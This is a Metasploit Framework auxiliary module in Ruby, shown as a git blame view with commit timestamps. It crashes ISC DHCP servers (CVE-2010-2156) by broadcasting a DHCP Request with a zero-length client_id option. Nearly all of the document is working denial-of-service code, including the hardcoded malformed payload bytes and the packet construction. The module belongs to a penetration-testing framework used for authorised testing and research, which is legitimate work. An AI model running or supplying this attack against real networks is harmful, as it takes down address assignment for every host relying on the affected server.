2011-04-11 15:56:39 +00:00
|
|
|
##
|
|
|
|
|
# $Id$
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
##
|
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
|
# http://metasploit.com/
|
2011-04-11 15:56:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
|
|
include Msf::Auxiliary::Dos
|
|
|
|
|
include Msf::Exploit::Capture
|
|
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
|
super(
|
|
|
|
|
'Name' => 'ISC DHCP Zero Length ClientID Denial of Service Module',
|
2011-10-17 02:42:01 +00:00
|
|
|
'Description' => %q{
|
|
|
|
|
This module performs a Denial of Service Attack against the ISC DHCP server,
|
|
|
|
|
versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request
|
2011-04-11 15:56:39 +00:00
|
|
|
message with a 0-length client_id option for an IP address on the appropriate range
|
2011-10-17 02:42:01 +00:00
|
|
|
for the dhcp server. When ISC DHCP Server tries to hash this value it exits
|
2011-04-11 15:56:39 +00:00
|
|
|
abnormally.
|
|
|
|
|
},
|
|
|
|
|
'Author' =>
|
|
|
|
|
[
|
|
|
|
|
'sid', # Original POC
|
2012-09-20 02:46:14 +00:00
|
|
|
'theLightCosine' # msf module
|
2011-04-11 15:56:39 +00:00
|
|
|
],
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Version' => '$Revision$',
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
2011-07-24 19:20:02 +00:00
|
|
|
[ 'CVE', '2010-2156' ],
|
2011-04-11 18:12:17 +00:00
|
|
|
[ 'OSVDB', '65246'],
|
2012-10-23 19:02:09 +00:00
|
|
|
[ 'EDB', '14185']
|
2011-04-11 15:56:39 +00:00
|
|
|
]
|
|
|
|
|
)
|
|
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
OptAddress.new('RIP', [true, 'A valid IP to request from the server'])
|
|
|
|
|
]
|
|
|
|
|
)
|
2011-04-21 21:05:17 +00:00
|
|
|
deregister_options('RHOST','FILTER','PCAPFILE','SNAPLEN','TIMEOUT')
|
2011-04-11 15:56:39 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def run
|
|
|
|
|
open_pcap
|
2011-07-27 20:21:47 +00:00
|
|
|
print_status("Creating DHCP Request with 0-length ClientID")
|
2011-07-26 01:29:21 +00:00
|
|
|
p = PacketFu::UDPPacket.new
|
|
|
|
|
p.ip_daddr = "255.255.255.255"
|
|
|
|
|
p.udp_sport = 68
|
|
|
|
|
p.udp_dport = 67
|
2011-04-11 15:56:39 +00:00
|
|
|
|
2011-07-26 01:29:21 +00:00
|
|
|
# TODO: Get a DHCP parser into PacketFu
|
|
|
|
|
chaddr = "\xaa\xaa\xaa\xaa\xaa\xaa"
|
|
|
|
|
dhcp_payload = "\x63\x82\x53\x63\x35\x01\x03\x3d\x00\xff"
|
|
|
|
|
p.payload = dhcp_req(chaddr,dhcp_payload)
|
|
|
|
|
p.recalc
|
2011-04-11 15:56:39 +00:00
|
|
|
print_status("Sending malformed DHCP request...")
|
2011-07-26 01:29:21 +00:00
|
|
|
capture_sendto(p, '255.255.255.255')
|
2011-04-11 15:56:39 +00:00
|
|
|
close_pcap
|
|
|
|
|
end
|
2011-07-26 01:29:21 +00:00
|
|
|
|
|
|
|
|
def dhcp_req(chaddr,payload)
|
|
|
|
|
req = "\x00" * 236
|
|
|
|
|
req[0,3] = "\x01\x01\x06" # Boot request on Eth with hw len of 6
|
|
|
|
|
req[12,4] = Rex::Socket.addr_aton(datastore['RIP'])
|
|
|
|
|
req[28,6] = chaddr
|
|
|
|
|
req + payload
|
|
|
|
|
end
|
|
|
|
|
|
2011-04-11 18:12:17 +00:00
|
|
|
end
|
